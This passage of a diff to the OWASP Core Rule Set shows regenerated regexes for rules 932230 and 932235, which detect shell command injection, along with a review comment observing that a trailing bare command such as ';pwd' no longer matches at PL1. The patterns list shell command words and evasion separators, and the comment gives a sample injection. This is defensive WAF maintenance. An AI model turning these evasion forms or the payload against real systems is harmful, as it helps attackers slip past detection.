\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:4[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?))(?:[\s\x0b&\),<>\|]|$).*|a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?-[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[&\),<>\|]|$){1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}(?:[\s\x0b&\),<>\|\}]|$){1,10})|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*
)?\x5c?j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*)|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[&\),<>\|]|$){1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}(?:[\s\x0b&\),<>\|\}]|$){1,10})|(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|[hr][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*))\b" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)
?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&
&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[arx][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[89][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?9|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?f|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|q[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:g|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|q)|[kz][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\
s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|(?:k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?g|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|c)|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|z)|y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\
x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:4[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?))[\s\x0b&\),<>\|].*|a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?-[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[&\),<>\|]{1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}[\s\x0b&\),<>\|\}]{1,10})|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*)|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[&\),<>\|]{1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}[\s\x0b&\),<>\|\}]{1,10})|(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|[hr][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*))\b" \ "id:932230,\ phase:2,\ block,\ @@ -135,7 +137,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" 
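Review bot: The regenerated 932230 pattern no longer accepts end-of-input after a command word — the `|$` alternative is dropped from the trailing separator groups, so `(?:[\s\x0b&\),<>\|]|$).*` becomes `[\s\x0b&\),<>\|].*` and `(?:[&\),<>\|]|$){1,10}` becomes `[&\),<>\|]{1,10}` — which means a payload that ends immediately after the command (e.g. `;pwd` as the last bytes of an argument value) falls out of this PL1 rule. The comment hunk earlier in this file attributes "commands with no arguments" to the new 932340 (PL1) and 932350 (PL3) rules, which are not in this view; a regression test for the bare-command-at-end-of-input case at PL1 should be added or pointed to so the hand-off from 932230 to 932340 is verified, since anything 932340 omits would only be caught by the PL3 sibling. As far as the expanded regex can be read, the word list also changed alongside the separator rewrite — `fd` and `udp` disappear while `pg` and `pwd` appear — and those additions/removals belong in CHANGES.md and in the regex-assembly source this generated line is built from, neither of which is visible here.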
@@ -154,6 +156,8 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?
 #
 # .932250 (base rule, PL1, targets two and three character commands)
 # .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+# .932340 (PL-1, matches commands with no arguments)
+# .932350 (PL-3, matches commands with no arguments)
 #
 # .932240 (generic detection, PL2, targets generic evasion attempts)
 # .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
@@ -179,7 +183,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 932235 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\
|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:HEAD|POST|y(?:arn|elp))(?:[\s\x0b&\),<>\|]|$)|a(?:dd(?:group|user)|getty|(?:l(?:ias|pine)|tobm|xel)(?:[\s\x0b&\),<>\|]|$)|nsible|p(?:parmor_[^\s\x0b]{1,10}\b|t(?:-get|itude(?:[\s\x0b&\),<>\|]|$)))|r(?:ch(?:[\s\x0b&\),<>\|]|$)|ia2c|j(?:-register|disp))|s(?:cii(?:-xfr|85)|pell)|u(?:ditctl|repot|search))|b(?:a(?:s(?:e(?:32|64|n(?:ame(?:[\s\x0b&\),<>\|]|$)|c))|h(?:[\s\x0b&\),<>\|]|$))|tch(?:[\s\x0b&\),<>\|]|$))|lkid(?:[\s\x0b&\),<>\|]|$)|pftrace|r(?:eaksw|(?:idge|wap)(?:[\s\x0b&\),<>\|]|$))|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler(?:[\s\x0b&\),<>\|]|$)|zip2)|s(?:ctl|ybox))|y(?:ebug|obu(?:[\s\x0b&\),<>\|]|$))|z(?:c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|diff|e(?:grep|xe(?:[\s\x0b&\),<>\|]|$))|f?grep|ip2(?:[
\s\x0b&\),<>\|]|$|recover)|less|more))|c(?:[89]9-gcc|a(?:ncel|psh)(?:[\s\x0b&\),<>\|]|$)|ertbot|h(?:(?:(?:att|di)r|mod|o(?:om|wn)|root|sh)(?:[\s\x0b&\),<>\|]|$)|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f(?:[\s\x0b&\),\-<>\|]|$))|(?:flag|pas)s|g(?:passwd|rp(?:[\s\x0b&\),<>\|]|$)))|lang(?:\+\+|[\s\x0b&\),<>\|]|$)|o(?:bc(?:[\s\x0b&\),<>\|]|$|run)|lumn(?:[\s\x0b&\),<>\|]|$)|m(?:m(?:[\s\x0b&\),<>\|]|$|and(?:[\s\x0b&\),<>\|]|$))|p(?:oser|ress)(?:[\s\x0b&\),<>\|]|$))|proc|w(?:say|think))|p(?:(?:an|io)(?:[\s\x0b&\),<>\|]|$)|ulimit)|r(?:ash(?:[\s\x0b&\),<>\|]|$)|on(?:[\s\x0b&\),<>\|]|$|tab))|s(?:cli(?:[\s